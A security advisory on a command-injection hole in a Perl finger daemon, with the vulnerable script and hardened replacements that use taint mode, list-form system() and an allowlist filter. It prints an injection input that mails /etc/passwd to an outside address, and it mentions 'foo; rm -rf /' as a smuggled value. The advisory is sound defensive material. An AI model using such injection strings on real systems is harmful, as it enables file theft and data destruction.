COMMAND

    fingerd

SYSTEMS AFFECTED

    Systems running the perl fingerd described below

PROBLEM

    Chris Terry posted about the perl fingerd currently available at:

        ftp://sunsite.unc.edu/pub/Linux/network/finger/daemons

        #!/usr/bin/perl
        # fingerd - a simple finger daemon
        $user = <STDIN>;
        chop($user);
        chop($user);
        if(-e "/usr/lib/finger/$user"){
            system "/usr/bin/perl /usr/lib/finger/$user";
        } else {
            system "/usr/bin/perl /usr/lib/finger/default $user";
        }

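    Because $user is interpolated into the single string given to
    system, the request line is handed to the shell.  So, we have the
    following: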

        [root@batleh perl-finger]# ./fingerd
        |cat /etc/passwd|mail you@your.host.com

SOLUTION

    If that fingerd were run with taint checks on (i.e. #! perl -T),
    then it wouldn't be such a huge hole.  A better way to have done
    it would be something like:

        #! /usr/bin/perl -T

        require 5;  # if you don't have it, upgrade already! :-)

        $ENV{PATH} = join ":", qw( /bin /usr/bin );

        $user = <STDIN>;
        chomp $user;

        if (-e "/usr/lib/finger/$user") {
            system "perl", "/usr/lib/finger/$user";
        }
        else {
            system "perl", "/usr/lib/finger/default", $user;
        }

    Note that passing a list to system (or exec) bypasses the shell,
    so even if $user eq 'foo; rm -rf /', there is no danger as far as
    this script is concerned (it all depends on what those scripts in
    /usr/lib are doing with their arguments).

    (If you're still wondering about taint checks, -T is just an
    instruction to perl telling it that it shouldn't let data from
    the outside world come in and be a part of operations that
    affect the outside world without first being subject to a
    thorough looking over.)
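
    A hardened variant of the script above, as an added example (not
    code from the original post).  It goes further than the fix shown:
    the request is matched against an allowlist and only the captured
    name is used, which untaints it (current Perl releases refuse
    tainted arguments to system even in list form) and keeps path
    separators out of the file name.  The character set, the
    32-character limit, the --selftest switch and the names clean_user
    and handle_request are assumptions made for this example.

```perl
#!/usr/bin/perl -T
# Added example: hardened variant of the page's fingerd (not the original code).
use strict;
use warnings;

# Taint mode requires a known-safe environment before running any program.
$ENV{PATH} = '/bin:/usr/bin';
delete @ENV{qw(IFS CDPATH ENV BASH_ENV)};

my $FINGER_DIR = '/usr/lib/finger';   # directory used by the page's script
my $PERL       = '/usr/bin/perl';     # absolute path, as in the page's first script

# Return an untainted login name, or undef when the request is not a plain name.
# Assumption: names are 1-32 chars from [A-Za-z0-9_.-] and do not start with
# '.' or '-', so "..", "/" and option-like strings never reach the file system.
sub clean_user {
    my ($line) = @_;
    return undef unless defined $line;
    $line =~ s/\r?\n\z//;             # finger clients end the request with CRLF
    return $line =~ /\A([A-Za-z0-9_][A-Za-z0-9_.-]{0,31})\z/ ? $1 : undef;
}

sub handle_request {
    my ($line) = @_;
    my $user = clean_user($line);
    unless (defined $user) {
        print "Invalid request.\r\n";
        return 1;
    }
    my $script = "$FINGER_DIR/$user";
    my @cmd = (-f $script) ? ($PERL, $script)
                           : ($PERL, "$FINGER_DIR/default", $user);
    # List form of system: no shell, each element becomes one argv entry.
    return system(@cmd) == 0 ? 0 : 1;
}

# Constructed inputs showing what the filter accepts and rejects.
if (@ARGV && $ARGV[0] eq '--selftest') {
    for my $in ("alice\r\n", "../default\r\n", "|cat /etc/passwd\r\n", "\r\n") {
        (my $shown = $in) =~ s/\r\n\z//;
        printf "%-20s %s\n", "'$shown'",
            defined clean_user($in) ? 'accepted' : 'rejected';
    }
    exit 0;
}

exit handle_request(scalar <STDIN>);
```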